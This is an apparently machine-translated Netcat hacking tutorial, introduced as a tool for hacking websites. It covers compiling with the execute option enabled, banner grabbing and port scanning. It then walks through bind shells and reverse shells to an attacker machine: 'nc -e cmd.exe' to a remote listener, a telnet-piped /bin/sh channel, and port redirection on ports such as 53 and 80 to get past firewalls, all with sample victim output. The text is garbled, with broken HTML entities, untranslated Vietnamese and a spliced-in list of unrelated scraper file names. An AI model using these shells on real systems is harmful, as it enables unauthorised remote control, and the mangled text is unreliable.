1. Introduction
Netcat is an indispensable tool if you want to hack a website there. So you need to know a bit about Netcat;)2. Compile
For Netcat for Linux, you must compile it before use. - edit netcat.c file with vi: vi netcat.c& nbsp; + find the line res_init (); in main () and added First two quotes & quot; / & quot ;: // res_init ();
& nbsp; + add the following 2 lines to the section #define (located at the top file):
& nbsp; & nbsp; & nbsp; & nbsp; #define GAPING_SECURITY_HOLE
& nbsp; & nbsp; & nbsp; & nbsp; #define TELNET
- translate: make linux
- test: ./nc -h
- if you want to run Netcat with instead ./nc , you just modify the environment variable PATH in the file ~ / .bashrc , & quot;. & quot;
& nbsp; PATH = / sbin: / usr / sbin: ...:. Netcat for Win does not need to compile because there are binary files available nc.exe . Only then unpack and run.
3. The options of Netcat
Netcat runs in command line mode. You run nc -h to know the parameters:C: & gt; nc -h connect to somewhere: nc [-options] hostname port [s] [ports] ... để nbound: nc -l -p port [tùy_chọn] [hostname] [port] options: -d detach from console, stealth mode prog inbound program to exec [dangerous !!] -g source-routing gateway hop point [s], up to 8 -G num source-routing pointer: 4, 8, 12, ... -h this cruft -i secs chờ khoảng thời gian khoảng trắng, các cổng đã scanned -l protocol, for inbound connections -L lắng harder, re-listen on socket close numeric-only IP addresses, không có DNS -x file dump of traffic -p port local port number -r randomize local and remote ports -s addr local source address TELNET negotiation -u UDP mode -v verbose [dùng hai lần có thể more verbose] -with timeout for kết nối và final net reads -z of zero-I / O mode [used for scanning] port numbers can be individual or ranges: m-n [inclusive] |
- listening mode: nc -l -p port [-select] [machine_name] [gate] 1 AzSoft_watermark_small.png cong-nghe? P = 1 en_metadesc.txt en_name.txt getpageinfo.sh getpagelink.sh imglink.txt imglist.txt img.quantrimang.com label: Some Text link_original.txt link.txt log.txt meta_desc.txt name.txt news t-142619 testimg2-0.jpg testimg2-1.jpg testimg2.jpg testimg3.jpg testimg.jpg thumb tim-hieu-excel-2016-200.jpg title_vn.txt tmp02.html tmp03.html tmp2.html tmpdesc2.txt tmpdesc3.txt tmpdesc4.txt tmpdesc5.txt tmpdesc6.txt tmpdesc7.txt tmpdesc.txt tmp.html tmpresult.txt tmptrans.txt transresult.txt wm.quantrimang.com www.mailenable.com www.microsoft.com. com Some options: Split Netcat from command prompt or console, Netcat will run in stealth mode (not shown in Taskbar)
prog execute the prog program, commonly used in listening mode
call the guide
-i secs delay secs milliseconds before sending one Data flow goes
Put Netcat into listen mode to wait for the link connected to
force netcat & quot; try & quot; listen. He will listen back again after a connection is disconnected.
Only use numeric IP addresses, such as 192.168.16.7, Netcat will not interrogate DNS
Log file to the file
Currently you'rean a7 specify the port port
Netcat request select random port (random)
-s addr Spoofing the source IP address is addr
Do not send additional information in one session telnet. When you telnet to a telnetd (telnetd), telnetd usually requires Your telnet client sends additional information such as the TERM environment variable, USER. If you use netcat with the -t option to telnet, netcat will not send these This information comes to telnetd.
- UDP (the default netcat uses TCP)
Displays detailed information about the current connection in. will display more detailed information.
-sec Set the timeout time for each connection secs milliseconds
Zero I / O mode, usually used when scanning port Netcat supports the port range. Syntax is port1-port2. For example: 1-8080 means 1,2,3, .., 8080
4. Examples:
4.1 Capture banner of web server
For example, nc to 172.16.84.2, port 80C: & gt; nc 172.16.84.2 80 HEAD / HTTP / 1.0 (here you enter 2 times) HTTP / 1.1 200 OK Date: Sat, 05 Feb 2000 20:51:37 GMT Server: Apache-AdvancedExtranetServer / 1.3.19 (Linux-Mandrake / 3mdk) mod_ssl / 2.8.2 OpenSSL / 0.9.6 PHP / 4.0.4pl1 Connection: close Content-Type: text / html |
C: & gt; nc -vv 172.16.84.1 80 172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA (UNKNOWN) 1 80 (?) Open HEAD / HTTP / 1.0 HTTP / 1.1 200 OK Date: Fri, 04 Feb 2000 14:46:43 GMT Server: Apache / 1.3.20 (Win32) Last Modified: Thu, 03 Feb 2000 20:54:02 GMT ETag: & quot; 0-cec-3899eaea & quot; Accept-Ranges: bytes Content-Length: 3308 Connection: close Content-Type: text / html sent 17, rcvd 245: NOTSOCK |
nc -vv
-o nhat_ki.log
80
|
& lt; 00000000 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d # HTTP / 1.1 200 OK. & lt; 00000010 0a 44 61 74 65 3a 20 46 72 69 2c 20 30 34 20 46 # .Date: Fri, 04F & lt; 00000020 65 62 20 32 30 30 30 20 31 34 3a 35 30 3a 35 34 # eb 2000 14:50:54 & lt; 00000030 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 # GMT..Server: Ap & lt; 00000040 61 63 68 65 2f 31 2e 33 2e 32 30 20 28 57 69 6e # ache / 1.3.20 (Win & lt; 00-005050 33 32 29 0d 0a 4c 61 73 74 2d 4d 6f 64 69 66 69 # 32) .. Last-Modifi & lt; 00000060 65 64 3a 20 54 68 75 2c 20 30 33 20 46 65 62 20 # ed: Thu, 03 Feb & lt; 00000070 32 30 30 30 20 32 30 3a 35 34 3a 30 32 20 47 4d # 2000 20:54:02 GM & lt; 00000080 54 0d 0a 45 54 61 67 3a 20 22 30 2d 63 65 63 2d # T..ETag: & quot; 0-cec- & lt; 00000090 33 38 39 39 65 61 65 61 22 0d 0a 41 63 63 65 70 # 3899eaea & quot; Accep & lt; 000000a0 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d # t-Ranges: bytes. & lt; 000000b0 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a # .Content-Length: & lt; 000000c0 20 33 33 30 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f # 3308..Connectio & lt; 000000d0 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e # n: close..Conten & lt; 000000e0 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d # t-Type: text / htm & lt; 000000f0 6c 0d 0a 0d 0a # l .... |
& gt; That means netcat is sent to the server
4.2 Port scanning
- run netcat with the -z option. For faster port scanning, use -n for netcat will not need DNS. An example is to scan the TCP ports (1- & gt; 500) of the host 172.16.106.1[dt @ vicki /] # nc 172.16.106.1 1-500 (UNKNOWN) 1 443 (?) Open (UNKNOWN) 1 139 (?) Open (UNKNOWN) 1 111 (?) Open (UNKNOWN) 1 6.1] 80 (?) Open (UNKNOWN) 1 23 (?) Open |
[dt @ vicki /] # nc
-nvv -z 172.16.106.1 1-500
(UNKNOWN) 1 1025 (?) Open
(UNKNOWN) 1 1024 (?) Open
(UNKNOWN) 1 138 (?) Open
(UNKNOWN) 1 137 (?) Open
(UNKNOWN) 1 123 (?) Open
(UNKNOWN) 1 111 (?) Open
|
E: & gt; nc -nvv -l -p 8080 -e cmd.exe nghe về [bất kỳ] 8080 ... Connect to 1 from (UNKNOWN) 1 3159 bị lỗi 0, rcvd 0: không rõ ổ cắm sockets |
C: & gt; nc -nvv 172.16.84.28080 (UNKNOWN) 1 8080 (?) Open Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. E: & gt; cd test cd test E: test & gt; dir / w dir / w Kích thước trong đĩa E không có nhãn. Volume Serial Number is B465-452F Directory of E: test [.] [..] NET.EXE head.log NetView.exe ntcrash.zip password.txt pwdump.exe 6 File (s) 262,499 bytes 2 Dir (s) 191,488,000 bytes free C: test & exit; exit sent 20, rcvd 450: NOTSOCK |
E: & gt; nc -nvv
-p 8080 -e cmd.exe
nghe về [bất kỳ] 8080 ...
|
netstat -a
...
TCP nan_nhan: domain nan_nhan: 0 LISTENING & lt; - port 53 is listening
...
E: & gt; nc -nvv -L -e cmd.exe
-s 172.16.84.1
p 53 - & gt; Listen on port 53
nghe trên 1 53 ...
connect to 1 from (UNKNOWN) 1 3163
|
5. Advanced technology
5.1 Telnet
- use telnet to connect the netcat listening window, and then issue the command from the window This is inverted telnet traffic, and sends the result to the other window. For example: - On the machine used to attack (172.16.84.1), open 2 windows netcat settles in turn Listening on port 80 and 25: + Netcat window (1)C: & gt; nc -nvv -l -p 80 [...] connect to 1 from & lt; UNKNOWN & gt; 1 1055 pwd ls -la |
C: & gt; nc -nvv -l -p 25 Hearing on [any] 25 ... Connect to 1 from (UNKNOWN) 1 1056 total 171 drwxr-xr-x 17 root root 4096 Feb 5 16:15. drwxr-xr-x 17 root root 4096 Feb 5 16:15 .. drwxr-xr-x 2 root root 4096 Feb 5 08:55 b & nbsp; (& nbsp; ²? n drwxr-xr-x 3 root root 4096 Feb 5 14:19 boot drwxr-xr-x 13 root root 106496 Feb 5 14:18 dev drwxr-xr-x 37 root root 4096 Feb 5 14:23 et & nbsp; = & nbsp; ²? drwxr-xr-x 6 root root 4096 Feb 5 08:58 home drwxr-xr-x 6 root root 4096 Feb 5 08:50 l & nbsp; (& nbsp; ²? b drwxr-xr-x 2 root root 7168 De & nbsp; = & nbsp; ²? 31 1969 mnt drwxr-xr-x 4 root root 4096 Feb 5 16:18 n & nbsp; = & nbsp; ²? drwxr-xr-x 2 root root 4096 Aug 23 12:03 opt x-root-xr-x 61 root root 0 Feb 5 09:18 pro & nbsp; = & nbsp; ²? drwx ------ 12 root root 4096 Feb 5 16:24 root drwxr-xr-x 2 root root 4096 Feb 5 08:55 sb & nbsp; (& nbsp; ²? n drwxrwxrwt 9 root root 4096 Feb 5 16:25 tmp drwxr-xr-x 13 root root 4096 Feb 5 08:42 usr drwxr-xr-x 18 root root 4096 Feb 5 08:52 var |
[root @ nan_nhan /] # telnet 172.16.84.1 80 | / bin / sh | telnet 172.16.84.1 25 / bin / sh: Trying: command not found / bin / sh: Connected: command not found / bin / sh: Escape: command not found Trying 172.16.84.1 ... Connected to 172.16.84.1. Escape character is '^]'. |
5.2 Create the following channel
The same as telnet reverse. On the attack machine, you set Netcat to listen on port 80 This port will not be blocked by the firewall:C: & gt; nc -nvv -l -p 80 [...] |
E: & gt; nc -e cmd.exe 172.16.84.1 80 |
C: & gt; nc -nvv -l -p 80 đang nghe pm [mọi] 80 ... connect to 1 from [UNKNOWN] 1 1035 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. E: & gt; |
5.3 Change port direction
You can use tunnel.pl or fpipe.exe. Consider the following example: - Runs on any port:E: & gt; nc -nvv -L -p 1234 -e cmd.exe nghe về [bất kỳ] 1234 ... |
C: & gt; perl tunnel.pl --port = 53 --tohost = 127.0.0.1 --toport = 1234 |
& nbsp;
C: & gt; fpipe -l 53 -r 1234 127.0.0.1 |